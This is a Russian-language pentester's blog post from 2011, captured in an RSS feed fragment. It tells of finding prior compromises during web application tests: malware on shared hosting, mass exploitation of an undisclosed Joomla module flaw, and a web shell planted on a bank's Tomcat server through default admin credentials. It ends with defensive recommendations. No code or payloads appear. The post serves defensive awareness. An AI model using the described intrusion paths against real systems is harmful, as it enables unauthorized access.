Sep 2011 05:33:46 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-1393625822542935738</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Как и несколько лет назад, веб-приложения по-прежнему остаются наиболее привлекательной мишенью для нарушителей всех мастей. Тут всегда хватит места и для матерых SEOшников, и для желающих нести свои мысли в массы путем подмены содержимого страниц, и, разумеется, веб-приложения являются первоочередной мишенью при преодолении внешнего периметра компаний, как в тестированиях на проникновение, так и в суровой жизни.&lt;br /&gt;
&lt;br /&gt;
Повсеместно низкая безопасность веб-приложений обусловлена множеством факторов: от качества разрабатываемого кода и выбранного языка программирования, до используемых конфигураций на стороне веб-сервера. Масло в огонь добавляет еще тот факт, что безопасность веб-приложений держится особняком относительно общей стратегии безопасности. Менеджеры структурных подразделений инициируют процессы развития бизнеса, которые в свою очередь, так или иначе, базируются на веб-технологиях. При этом служба управления информационной безопасностью в среднестатистической компании как бы закрывает глаза на то, что приобретаемое решение может содержать уязвимости. Более того, из опыта проводимых работ, больше половины ИБ подразделений в российских компаниях даже не подозревают, кто ответственен за внешний, официальный сайт компании, не говоря уже о том, кто занимается его безопасностью. Потому веб-приложения и взламывают на потоке.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Проводимые в последнее время пентесты наглядно подтверждают эти доводы. Когда группа пентестеров используя уязвимости веб-приложений доходили до выполнения команд операционной системы, (помимо радости собственного превосходства)) создавалось обоснованное ощущение, что мы тут не одни.&lt;br /&gt;
&lt;br /&gt;
В одном из пентестов на сайте заказчика было найдено несколько критических уязвимостей, которые в перспективе могли позволить выполнять команды на сервере. Однако воспользоваться ими продолжительное время не получалось. Секунды превращались в минуты, минуты складывались в часы, цель была так близка, но все старания были безуспешны. Оглядевшись вокруг было замечено, что перед нами лишь один из сайтов большого хостинга. Учитывая, что на страницах исследуемого сайта и его соседей был замечен один и тот же зловред, вполне логично предположить, что злоумышленник до нас вряд ли стал бы заморачиваться с уязвимостями именно нашего анализируемого сайта. Наверняка он шел по пути наименьшего сопротивления и залился через соседей. Но ограничения при пентесте не позволяют повторить подобные подвиги. Между тем, старания все-таки не были напрасны и используя каскад уязвимостей сайт заказчика сдал свою оборону. Далее, вместо классического сбора информации, предстояло выяснить, каким образом зловред попал на страницы этого ресурса.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Uqout513Uyg/Tnr87UG8pmI/AAAAAAAABSw/arW6b5CR-5w/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-Uqout513Uyg/Tnr87UG8pmI/AAAAAAAABSw/arW6b5CR-5w/s400/1.png" width="326" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Следующая история раскрывает тему использования уязвимостей нулевого дня при пентестах. Перед нами очередной оф. сайт другого заказчика на вполне себе безопасной системе управления сайтом &lt;a href="http://www.joomla.org/"&gt;Joomla&lt;/a&gt;. При поверхностном серфинге на глаза попадает уязвимый модуль, информация об уязвимости в котором еще не успела просочиться в паблик. Также известна информация, что на днях через указанный модуль проходила массовая заливка. И как это не странно, сплоитс у нас уже был на руках:)) Далее, как в голливудских фильмах. Вводим target, запускаем, заливаемся, радуемся)) После этого предстояло ответить на вопрос, "кто здесь"? И ответ не заставил себя долго ждать. Как бы шеллы с eval и base64 очень палевны.&lt;br /&gt;
&lt;br /&gt;
Последняя история, о которой я хочу сегодня рассказать, не менее показательна, чем остальные. Шутка ли, когда на одном из внешних сайтов всеми известного и любимого российского банка установлен бэкдор на языке наших поднебесных друзей. Более того, даты показали, что бэкдор был залит более года назад и на протяжении всего этого времени оставался незамеченным! Остроты всей истории придает также тот факт, что операционная система, на котором расположен веб-сервер, входит в состав корпоративного домена Active Directory банка. Как было выяснено позже службой управления ИБ самого банка, за все время был зафиксирован лишь один запрос, который собственно и установил бэкдор, т.е. в этот раз просто повезло. Кстати, бэкдор (аля веб-шелл) под Tomcat действительно оказался довольно наворочен (добавили себе в копилку), а установлен он был к слову через дефолты в интерфейсе администрирования Tomcat.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-qlZJqBh16DU/Tnr9uXjoPvI/AAAAAAAABS0/ZgO0eQlhjO4/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="151" src="http://2.bp.blogspot.com/-qlZJqBh16DU/Tnr9uXjoPvI/AAAAAAAABS0/ZgO0eQlhjO4/s400/2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;Так как же защитится от подобных угроз?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Во-первых, если вы планируете развернуть свой сайт на внешнем хостинге, поинтересуйтесь у хостера, какие действия он предпринимает для защиты сайтов своих клиентов. На эту тему вспоминается еще одна история. Анализировали мы как-то сайт, расположенный в одном из регионов нашей необъятной родины. Зафиксировали SQL-иньекцию и принялись ее раскручивать, и, буквально через полчаса, видим послание от хостера в свой адрес:) Но самое примечательное в этой истории это то, что хостер оперативно обеспечил виртуальный патчинг найденной нами уязвимости. С другой стороны, выбирая хостера, возможно не следует слишком много от него ожидать, но фундаментальные механизмы безопасности он должен обеспечивать при оказании своих услуг.&lt;br /&gt;
&lt;br /&gt;
Во-вторых - используйте стойкие, уникальные пароли везде, особенно на внешних веб-приложениях. Доступ к интерфейсам администрирования сайтом предоставляйте только доверенному списку IP-адресов. К слову, эти два простых правила вместе с минимальными привилегиями у пользователя, который взаимодействует с базой данных, помогает существенно снизить ущерб при наличии уязвимости типа внедрение операторов SQL.&lt;br /&gt;
&lt;br /&gt;
И наконец, защищаясь от атак нулевого дня помните, что чем больше защитных механизмов вы обеспечите, тем выше вероятность того, что вы убережете свой сайт от подобной напасти. Вероятно от целенаправленной атаки с глупыми уязвимостями в коде приложения защититься не получится, но от массовых атак защититься вполне реально. А это уже не мало!&lt;br /&gt;
&lt;br /&gt;
Так, что же требуется, чтобы защитить сайт от атаки нулевого дня при этом не прибегая к анализу его безопасности методом фаззинга или исходного кода? По моему видению должно быть реализовано как минимум следующее:&lt;br /&gt;
- стойкие пароли к используемым идентификаторам во всех интерфейсах (ftp, раздел администрирования и т.п.).&lt;br /&gt;
- все интерфейсы администрирования должны быть доступны только для доверенных IP-адресов; опционально, использование двухфакторной аутентификации везде, где это возможно.&lt;br /&gt;
- минимизация привилегий во всех компонентах.&lt;br /&gt;
- правильно настроенные таблицы разграничения доступа (начиная с файловой системы и заканчивая разграничением доступа средствами системы управления сайтом, если она предоставляет подобный функционал).&lt;br /&gt;
- безопасные конфигурации веб-сервера и его среды (например, безопасные конфигурации PHP).&lt;br /&gt;
- использование превентивных механизмов контроля (Web Application Firewall).&lt;br /&gt;
- ограничение сетевого доступа со стороны веб-приложения к любым другим компонентам сети; размещение веб-сервера в изолированной сетевой среде (aka персональная ДМЗ).&lt;br /&gt;
&lt;br /&gt;
Придерживаясь перечисленных подходов вы существенно повысите безопасность своего веб-приложения. Желаю успехов в постоянной битве добра с добром по другую сторону :)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-1393625822542935738?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-22T16:33:46.060+04:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-Uqout513Uyg/Tnr87UG8pmI/AAAAAAAABSw/arW6b5CR-5w/s72-c/1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">12</thr:total></item><media:rating>nonadult</media:rating></channel></rss>

